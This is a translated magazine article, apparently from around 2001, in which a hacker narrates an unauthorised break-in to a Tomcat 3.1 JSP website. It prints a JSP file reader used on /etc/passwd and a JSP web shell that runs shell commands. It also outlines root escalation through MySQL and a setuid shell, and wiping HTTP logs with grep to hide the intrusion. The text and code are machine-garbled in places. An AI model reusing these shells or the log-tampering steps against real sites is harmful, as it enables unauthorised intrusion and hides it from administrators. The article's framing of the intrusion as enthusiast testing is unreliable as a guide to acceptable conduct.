Editor:"On-site documentary" is a new small section of the hacker attack and defense area. Here we will introduce you to some real cases of online hacker intrusion. Different from the previous cases from the perspective of website security personnel, these cases describe the whole process of intrusion from the perspective of hackers. Through these cases, you can clearly understand the technical means and strategies used by hackers when they intrude into a website. This topic deals with specific technical details, because we aim to improve network security through such technical exchanges, rather than maliciously attacking others' computers.
"On-site documentary" case collection mailbox: Jiaoxq@staff.ccidnet.com. Please note the title of the letter: on-site documentary case. Please describe the intrusion process and ideas in detail in the content of the manuscript, and enjoy excellent remuneration.
By chance, when you browse a website, the page is fresh and comfortable. Websites are developed using JSP. For my personal interests, I decided to test the security of my system.
Telnet www.target.com 8080 GET/maid HTTP/1.1 [Enter] [Enter] |
The returned results are as follows:
HTTP/1.0 404 not found Date: Sun, 08 Jul 2001 07:49:13 GMT Servlet-engine: Tomcat web server/3.1 (JSP 1.1; servlet 2.2; Java 1.2.2; Linux 2 . 2.12 i386; Java. Vendor = Blackdown Java-Linux Team) Content-language: En Content-Type: text/html Status: 404<H1> error: 404 <H2> location:/chinansl </H2> file not found <br>/chinansl |
The running webserver name "Tomcat 3.1" is obtained ". I remember I found this version of vulnerability and posted it to the bugtrap.
Recall that we can exit the web directory through the "..." technology, so:
Http: // target: 8080/.../../% 00.jsp (NO) Http: // target: 8080/file/index. jsp (NO) Http: // target: 8080/index. jsp (NO) Http: // target: 8080/index. jsp % 81 (NO) Http: // target: 8080/index. js % 70 (NO) Http: // target: 8080/index. jsp % 2581 (NO) Http: // target: 8080/WEB-INF/(NO) |
It seems that the security status is good. Let's take a deeper test. Tomcat 3.1 comes with a management tool that allows you to view directories and files on the web and add context. So try:
Http: // destination: 8080/admin/ |
The Administrator did not delete or prohibit access to this directory. In terms of security, this is a very important mistake.
Next, click the "view all context" button to list the names of some files and directories under the web directory, and a component for uploading files will soon be found, use this component to upload a JSP file to the target web directory:
<% @ Page import = "Java. Io. *" %> 〉 <% String file = request. getparameter ("file "); String STR = ""; Fileinputstream FCM = NULL; Datainputstream Dis = NULL; Try { FS = new fileinputstream (File ); Dis = new datainputstream (FCM ); While (true ){ Try { STR = dis. Readline (); } Catch (exception e ){} If (STR = NULL) break; Out. Print (STR + "<br> 〉"); } } Catch (ioexception e ){} %> 〉 |
Then execute:
Http: // target: 8080/upload/test. jsp? File =/etc/passwd |
The password is displayed. The next step is to guess the password and fail. However, now it is equivalent to having a shell. If you cannot guess the password, you can use IE as the shell environment first.
Write another JSP file:
<% @ Page import = "Java. Io. *" %> 〉 <% Try { String cmd = request. getparameter ("cmd "); Process child = runtime.getruntime(cmd.exe C (CMD ); Inputstream in = Child. getinputstream (); Int C; While (C = in. Read ())! =-1 ){ Out. Print (char) C ); } In. Close (); Try { Child. waitfor (); } Catch (interruptedexception e ){ E. printstacktrace (); } } Catch (ioexception e ){ System. Err. println (E ); } %> 〉 |
Then upload the JSP file through upload, and there is a shell.
Http: // target: 8080/upload/CMD. jsp? Cmd = LS +-La +/ (Detailed results are not listed here) |
How can I obtain the root permission? After some searches, it is found that MySQL is installed in the system and the MySQL password is obtained from the JSP Source Code. Run:
Sqld "> http: // target: 8080/upload/CMD. jsp? Cmd = Ps + Aux + | grep + mysqld |
Display:
Root 87494 0.2 1.9 17300 4800 P0-s 28jun01. 72/usr/local/data/MySQL |
The system runs MYSQL as the root user. Now I thought about it. Now that I know the MySQL password, I can write a shell program to create a table and put my data in the table, then use "select... into OUTFILE; "to create a file on the system, allowing the user to run my program while executing the Su. (Do you still remember that apache.org was intruded? This method is used by hackers ).
After that, it is relatively simple to upload a program such as bindshell, run the program, and obtain the nobody permission. You can use the setuid shell created by Su root to make yourself a root user.
However, the following operations have taken place, and the results are quite surprising:
Http: // target: 8080/upload/CMD. jsp? Cmd = ID |
Display:
Uid = 0 (Root) gid = 0 (XXX) groups = 0 (XXX), 2 (XXX), 3 (XXX), 4 (XXX), 5 (XXX ), 20 (XXX), 31 (XXX) |
Originally, this web shell was root! How does the Administrator perform security settings?
Http: // target: 8080/upload/CMD. jsp? Cmd = Ps + Aux It was run as root (not listed) |
The rest:
1. delete my Telnet records.
2. Delete HTTP logs.
To clear logs, I used cat XXX | grep-V "ip"> temp to overwrite the modified log files.
Note that I did not change the page of the website because I am just a network security enthusiast. So, send an email to system admin! Of course, as I mentioned in my letter, we will be very pleased if it is necessary to provide security services to him